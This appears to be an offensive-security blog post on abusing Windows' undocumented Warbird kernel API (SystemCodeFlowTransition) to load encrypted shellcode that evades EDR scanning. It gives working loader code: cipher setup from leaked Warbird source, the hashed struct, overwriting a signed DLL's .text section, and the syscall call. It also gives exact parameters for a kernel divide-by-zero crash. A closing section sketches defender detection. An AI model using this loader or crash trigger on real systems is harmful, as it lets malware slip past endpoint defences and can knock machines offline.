Feistel Cipher
The Feistel cipher used by Warbird is a custom implementation and is not documented by Microsoft at all.
Thankfully, a blog post by DownWithUp already documents how the Warbird API can be used to encrypt arbitrary data using a clever combination of syscalls to make the kernel perform the encryption for you. That way, we can use the kernel as a “black box” implementation of the Feistel cipher, without having to know the details of the cipher itself.
We experimented with their technique to encrypt data for the Warbird decryption routine but were unable to use the encrypted data with the runtime decryption. Luckily, a leak of the Warbird framework source code from 2017 contains a working implementation of the Feistel cipher used by Warbird, which we can use to encrypt our shellcode for the runtime decryption routine. This source code has been circulating on the internet for a while and has recently become available on GitHub.
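For readers unfamiliar with the construction: a Feistel network splits each block into two halves and, in every round, XORs one half with a keyed round function of the other half before swapping them. Decryption runs the same rounds with the round keys in reverse order, which is why the round function never has to be invertible. The sketch below is a generic four-round example with a made-up round function and key schedule (ToyRound and the keys array are hypothetical). It is not Warbird's cipher, whose per-round configuration is described by the FEISTEL64_ROUND_DATA entries of the leaked code.

```cpp
#include <array>
#include <cstddef>
#include <cstdint>

// Illustrative round function (hypothetical, NOT Warbird's). A Feistel network
// does not need F to be invertible; this one just mixes the half with the key.
constexpr uint32_t ToyRound(uint32_t half, uint32_t round_key) {
    uint32_t x = half ^ round_key;
    x = (x << 7) | (x >> 25);  // rotate left by 7 bits
    return x * 0x9E3779B1u;    // multiply by an odd constant (wraps mod 2^32)
}

// Encrypts one 64-bit block split into 32-bit halves.
// Each round maps (L, R) to (R, L ^ F(R, k)).
constexpr uint64_t FeistelEncrypt(uint64_t block, std::array<uint32_t, 4> keys) {
    uint32_t left = static_cast<uint32_t>(block >> 32);
    uint32_t right = static_cast<uint32_t>(block);
    for (std::size_t i = 0; i < keys.size(); ++i) {
        uint32_t next_right = left ^ ToyRound(right, keys[i]);
        left = right;
        right = next_right;
    }
    return (static_cast<uint64_t>(left) << 32) | right;
}

// Decrypts by undoing the rounds in reverse key order:
// (L', R') maps back to (R' ^ F(L', k), L').
constexpr uint64_t FeistelDecrypt(uint64_t block, std::array<uint32_t, 4> keys) {
    uint32_t left = static_cast<uint32_t>(block >> 32);
    uint32_t right = static_cast<uint32_t>(block);
    for (std::size_t i = keys.size(); i-- > 0;) {
        uint32_t prev_left = right ^ ToyRound(left, keys[i]);
        right = left;
        left = prev_left;
    }
    return (static_cast<uint64_t>(left) << 32) | right;
}
```

For any 64-bit value x and any keys, FeistelDecrypt(FeistelEncrypt(x, keys), keys) returns x; because both functions are constexpr (C++17), this can even be checked at compile time.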
Warbird Syscall
To request a decryption and allocation from the kernel, the process must call the NtQuerySystemInformation syscall with the SystemInformationClass set to SystemCodeFlowTransition (0xB9). Although this is not officially documented by Microsoft, thanks to the leak of Windows source code, we have access to a lot of information about this syscall. The syscall takes a pointer to a struct containing a WbOperationType that specifies the operation to be performed, and a pointer to a struct containing additional data for the operation. According to the leaked source code, the WbOperationType enum contains the following values:
typedef enum {
    WbOperationNone,
    WbOperationDecryptEncryptionSegment,
    WbOperationReEncryptEncryptionSegment,
    WbOperationHeapExecuteCall,
    WbOperationHeapExecuteReturn,
    WbOperationHeapExecuteUnconditionalBranch,
    WbOperationHeapExecuteConditionalBranch,
    WbOperationProcessEnd,
    WbOperationProcessStartup,
} WbOperationType;
We will focus on the WbOperationHeapExecuteCall operation, which can be used to perform the described decryption and allocation routine in the kernel. The struct that is passed to the syscall for this operation is also part of the leaked source code but appears to have changed slightly since the leak. Combining the leak with the information from Alex Ionescu’s talk about Warbird at Ekoparty 2017, we can assume that the struct looks something like this:
typedef struct _HEAP_EXECUTE_CALL_ARGUMENT {
    uint8_t ucHash[0x20];
    uint32_t ulStructSize;
    uint32_t ulZero;
    uint32_t ulParametersRva;
    uint32_t ulCheckStackSize;
    uint32_t ulChecksum : CHECKSUM_BIT_COUNT;
    uint32_t ulWrapperChecksum : CHECKSUM_BIT_COUNT;
    uint32_t ulRva : RVA_BIT_COUNT;
    uint32_t ulSize : FUNCTION_SIZE_BIT_COUNT;
    uint32_t ulWrapperRva : RVA_BIT_COUNT;
    uint32_t ulWrapperSize : FUNCTION_SIZE_BIT_COUNT;
    uint64_t ullKey;
    WarbirdRuntime::FEISTEL64_ROUND_DATA RoundData[NUMBER_FEISTEL64_ROUNDS];
} HEAP_EXECUTE_CALL_ARGUMENT, * PHEAP_EXECUTE_CALL_ARGUMENT;
We’ll only highlight the most important fields for our purposes:
- ucHash: A 32-byte SHA-256 hash over the remaining fields of the struct. If the stored hash does not match the hash of the rest of the struct, the kernel refuses to perform the operation. The hash covers the fields relevant for decryption and allocation and is meant to prevent tampering with the struct. Note, however, that it only provides integrity, not authentication: an attacker can still modify the struct, as long as they compute a new hash over the modified fields.
- ulStructSize: The size of the struct in bytes.
- ulRva: The offset of the encrypted code relative to the start of the struct in memory[1].
- ulSize: The size of the encrypted code in bytes.
- ullKey: The 8-byte key used for the Feistel cipher.
- RoundData: Configuration data for each round of the Feistel cipher.
All other fields are not relevant for our purposes and should be set to zero.
The complete struct passed to the syscall then simply contains the WbOperationType, a pointer to the HEAP_EXECUTE_CALL_ARGUMENT struct, and a pointer to an NTSTATUS variable that will receive the result of the operation:
typedef struct _WB_OPERATION {
    WarbirdRuntime::WbOperationType OperationType;
    union {
        // ...
        PHEAP_EXECUTE_CALL_ARGUMENT pHeapExecuteCallArgument;
        // ...
    };
    NTSTATUS* Result;
} WB_OPERATION, * PWB_OPERATION;
Abusing Warbird
As previously stated, only Microsoft services are intended to invoke Warbird syscalls. To enforce this, the Windows kernel requires the HEAP_EXECUTE_CALL_ARGUMENT struct to reside in a memory region marked with an ImageSigningLevel of 12, which indicates that the region “belongs to” a Windows component. As DownWithUp already noted, this check can easily be bypassed by first loading a Microsoft-signed DLL into your own process and then using VirtualProtect(RW) and memcpy to overwrite the DLL’s .text section with the HEAP_EXECUTE_CALL_ARGUMENT struct. For convenience, we place the encrypted shellcode directly after the struct in the .text section and simply set the ulRva field to the size of the struct. This way, the kernel decrypts the shellcode located directly after the struct in the same memory region.
After the data has been placed, the .text section must be marked as executable using VirtualProtect(RX) and can then be used to invoke the Warbird syscall.
Preparation
We first need to encrypt the shellcode we want to execute using the Feistel cipher. We can use the implementation from the leaked Warbird source code to do this:
BYTE shellcode[] = { ...};
BYTE encrypted[sizeof(shellcode)];
auto cipher = WarbirdCrypto::CCipherFeistel64::CreateRandom();
WarbirdCrypto::CChecksum checksum;
WarbirdCrypto::CKey key { .u64 = 0xdeadbeefcafeaffe };
cipher->Encrypt((BYTE*) shellcode, (BYTE*) encrypted, sizeof(shellcode), key, 0xf0, &checksum);
The WarbirdCrypto namespace can be taken directly from the leaked source code and #included in your project. The headers from the leaked source code are not functional on their own; they require some additional includes, as well as a workaround to use them outside of the WarbirdRuntime namespace:
#include <Windows.h>
#include <set>
#include <sstream>
#define WARBIRD_CRYPTO_ENABLE_CREATE_RANDOM
#include "../warbird-example/WarbirdCUtil.inl"
#include "../warbird-example/WarbirdRandom.inl"
#define Random WarbirdRuntime::g_Rand.Random
#include "../warbird-example/WarbirdCiphers.inl"
#undef Random
To load the encrypted shellcode, we need to create the HEAP_EXECUTE_CALL_ARGUMENT struct:
HEAP_EXECUTE_CALL_ARGUMENT params{
    .ucHash = { },              // We'll leave this empty for now
    .ulStructSize = sizeof(HEAP_EXECUTE_CALL_ARGUMENT),
    .ulZero = 0,
    .ulParametersRva = 0,
    .ulCheckStackSize = 0,
    .ulChecksum = 0,
    .ulWrapperChecksum = 0,
    .ulRva = sizeof(HEAP_EXECUTE_CALL_ARGUMENT), // shellcode starts right after the struct
    .ulSize = static_cast<uint32_t>(sizeof(shellcode)),
    .ulWrapperRva = 0,
    .ulWrapperSize = 0,
    .ullKey = key.u64,
    .RoundData = { }
};
// Copy over the round configuration
memcpy(params.RoundData, cipher->m_Rounds, sizeof(cipher->m_Rounds));
// Lastly, calculate the hash of the struct
picosha2::hash256(
    reinterpret_cast<uint8_t*>(&params.ulStructSize), // Start after the hash field
    reinterpret_cast<uint8_t*>(&params + 1),          // Up to the end of the struct
    reinterpret_cast<uint8_t*>(&params.ucHash),       // Store the hash here
    reinterpret_cast<uint8_t*>(&params.ulStructSize)  // End of the hash field
);
The picosha2 namespace comes from PicoSHA2, a simple header-only SHA-256 implementation.
Execution
After the data has been prepared, we can now load the Microsoft-signed DLL into our process, change the contents of the .text section to contain the HEAP_EXECUTE_CALL_ARGUMENT struct and encrypted shellcode, mark the section as executable and finally call the Warbird API:
HMODULE clipc = LoadLibraryA("clipc.dll"); // Microsoft-signed DLL
if (clipc == NULL) return 1;
DWORD old;
VirtualProtect(clipc, sizeof(params) + sizeof(encrypted), PAGE_READWRITE, &old);
memcpy(clipc, &params, sizeof(params));
memcpy((uint8_t*)clipc + sizeof(params), &encrypted, sizeof(encrypted));
VirtualProtect(clipc, sizeof(params) + sizeof(encrypted), PAGE_EXECUTE_READ, &old);
NTSTATUS result = 0;
WB_OPERATION request{
    .OperationType = WarbirdRuntime::WbOperationHeapExecuteCall,
    .pHeapExecuteCallArgument = (PHEAP_EXECUTE_CALL_ARGUMENT)clipc,
    .Result = &result
};
NTSTATUS status = NtQuerySystemInformation(SystemCodeFlowTransition, &request, sizeof(request), nullptr);
And that’s it! The kernel will now decrypt the shellcode, place it in the process’s memory and redirect execution to the beginning of the decrypted shellcode. Notice that we never had to invoke a syscall with the decrypted shellcode as an argument. With conventional loaders this is usually unavoidable: when VirtualProtect is called to make a memory region executable, for example, the region typically already contains the decrypted shellcode, and EDR products use exactly this as a point of detection by scanning the memory regions passed to the kernel for known signatures. That isn’t possible in our case: an EDR spying on syscalls and scanning the associated memory regions will only “see” encrypted shellcode, and thus come up empty-handed. The full code for the above example can be found in our GitHub repository.
Limitations
We’ve now seen how we can load encrypted shellcode using the Warbird API, but there are some limitations to keep in mind:
- We still need to call VirtualProtect(RX) to change the permissions of the .text section. This could be detected as suspicious behaviour by some EDR products, but we haven’t seen any detections based solely on this pattern, because the contents placed in the .text section are fully encrypted and thus not detectable as malicious shellcode.
- The functionality we’re abusing here was never intended to be used for entire shellcode payloads but rather for small, sensitive code blocks. The Warbird API limits the size of the encrypted code to 0x10000 bytes, so we cannot load any shellcode larger than 64 KiB. There might be ways to work around this limitation by dynamically loading and re-linking the shellcode, but this is left as an exercise for the reader 😉
We’ve not put much research effort into the other available operations, especially those not previously documented by DownWithUp, so these are probably a good starting point for further research.
Blue Team Perspective
This technique is very effective at bypassing existing shellcode loading detections. To simplify a bit, an anti-malware product typically scans all memory addresses referenced by an application when it calls a Windows API that could cause execution to start at that address, such as NtCreateThreadEx, or that causes memory to become executable, such as NtProtectVirtualMemory. The product may then use a signature database or pattern-based detection to determine whether the memory that is about to be executed is malicious. In some cases, an anti-malware product might simply block any sequence of operations that allocates memory, marks it as executable and passes execution to it, regardless of the actual memory content, especially if the executable performing these operations is not trustworthy by some metric. The technique presented here bypasses this scanning because the memory we “supply” as pointer arguments to the Windows API only contains encrypted shellcode. The address of the decrypted shellcode, which is allocated by the kernel itself, is never even passed back to userspace. Because the shellcode is decrypted and executed “in one go” by the kernel itself, any hooks on Windows API calls placed by an anti-malware product are bypassed.
To nonetheless detect this behaviour, an anti-malware product may opt to decrypt any shellcode passed to NtQuerySystemInformation itself and check the decrypted shellcode for known signatures, block any use of Warbird APIs in non-Microsoft processes, or may rely on behaviour detection and periodic memory scanning to detect the known malicious shellcode, once it has been decrypted by the kernel.
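As a rough illustration of the option to block Warbird APIs in non-Microsoft processes, a hook on NtQuerySystemInformation could first classify the request before deciding to block it or to hand the referenced buffer to a scanner. The sketch below assumes that OperationType is a 32-bit value at offset 0 of the request buffer (as in the WB_OPERATION struct shown earlier) and that WbOperationHeapExecuteCall has the value 3, which follows from the implicit zero-based numbering of the leaked enum. The function names are hypothetical; a real hook would additionally have to probe the caller's buffer safely and decide which processes count as Microsoft components.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Constants from the listings above. The operation value assumes the leaked
// WbOperationType enumerators are numbered implicitly from zero.
constexpr uint32_t kSystemCodeFlowTransition = 0xB9;
constexpr uint32_t kWbOperationHeapExecuteCall = 3;

// Pure decision logic: is this a Warbird HeapExecuteCall request?
constexpr bool IsHeapExecuteCallRequest(uint32_t info_class, uint32_t operation_type) {
    return info_class == kSystemCodeFlowTransition &&
           operation_type == kWbOperationHeapExecuteCall;
}

// Hypothetical helper for an existing NtQuerySystemInformation hook. Assumes the
// request buffer begins with a 32-bit OperationType field, as in WB_OPERATION.
bool InspectQuerySystemInformation(uint32_t info_class, const void* buffer, std::size_t length) {
    if (info_class != kSystemCodeFlowTransition) return false;
    if (buffer == nullptr || length < sizeof(uint32_t)) return false;
    uint32_t operation_type = 0;
    std::memcpy(&operation_type, buffer, sizeof(operation_type));  // avoids an unaligned read
    return IsHeapExecuteCallRequest(info_class, operation_type);
}
```

Keeping the decision logic separate from the buffer access makes the policy easy to test; what happens to a flagged request (blocking, or decrypting and scanning the payload) is left to the surrounding product.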
Conclusion
This is a very powerful technique, as it allows us to bypass most AV and EDR scrutiny. If an EDR product intercepts the syscall, it will only see the encrypted shellcode, and not the decrypted shellcode that is executed, so any signatures or heuristics that the EDR product uses to detect malicious shellcode will not trigger. We’ve successfully used this technique in practice to bypass multiple leading EDR solutions.
Bonus: BSOD
While researching and experimenting with Warbird, we encountered a bug in the Warbird API that can be used to trigger a blue screen of death. When allocating memory in the process’s heap, the kernel adds some randomness to the base address of the allocated memory, presumably as a kind of “Pseudo Address Space Layout Randomization (ASLR)”. An implementation error in this allocation function causes a divide by zero in the kernel when the required size is between 0xffc1 and 0x10000 (inclusive):
uint32_t slot_count = (required_size + 63) / 64;
uint32_t rand_offset = ExGenRandom(1) % (1024 - slot_count);
Working backwards: when slot_count == 1024, the modulo operation has a divisor of zero, which causes a division by zero in the kernel. Because slot_count is simply required_size divided by 64 (rounded up), the bug triggers for 0xffc1 <= required_size <= 0x10000.
The value of required_size here is simply ulSize + 16, so any values for ulSize in the range from 0xffb1 to 0xfff0 will cause the division by zero. We have included a PoC for this bug in our GitHub repository.
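The boundaries can be double-checked with a small compile-time model of the two decompiled lines. It reproduces only the divisor computation (ExGenRandom is omitted) and assumes 32-bit unsigned arithmetic, as the declared uint32_t types suggest; the helper names are hypothetical. Under this model, exactly the 64 ulSize values from 0xffb1 to 0xfff0 yield a zero divisor. The largest of them corresponds to a required_size of 0x10000, because (0x10000 + 63) / 64 still rounds down to 1024, while for larger sizes 1024 - slot_count wraps around to a non-zero value instead.

```cpp
#include <cstdint>

// Mirrors slot_count from the decompiled allocator: round up to 64-byte slots.
constexpr uint32_t SlotCount(uint32_t required_size) {
    return (required_size + 63) / 64;
}

// Divisor of the modulo operation; unsigned, so it wraps instead of going negative.
constexpr uint32_t ModuloDivisor(uint32_t required_size) {
    return 1024 - SlotCount(required_size);
}

// required_size is ulSize + 16, per the analysis above.
constexpr bool TriggersDivideByZero(uint32_t ul_size) {
    return ModuloDivisor(ul_size + 16) == 0;
}

// Counts the crashing ulSize values in the inclusive range [first, last].
constexpr uint32_t CountCrashingSizes(uint32_t first, uint32_t last) {
    uint32_t count = 0;
    for (uint32_t size = first; size <= last; ++size) {
        if (TriggersDivideByZero(size)) ++count;
    }
    return count;
}
```

For example, CountCrashingSizes(0xff00, 0x10000) evaluates to 64, and TriggersDivideByZero is false for 0xffb0 and 0xfff1, just outside the range.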
Further Reading
[1] This is actually a bit more involved, as it is relative to the start of the current Warbird block. If we set ulParametersRva to zero though, the offset will be relative to the start of the struct. Refer to the talk by Alex Ionescu for more information.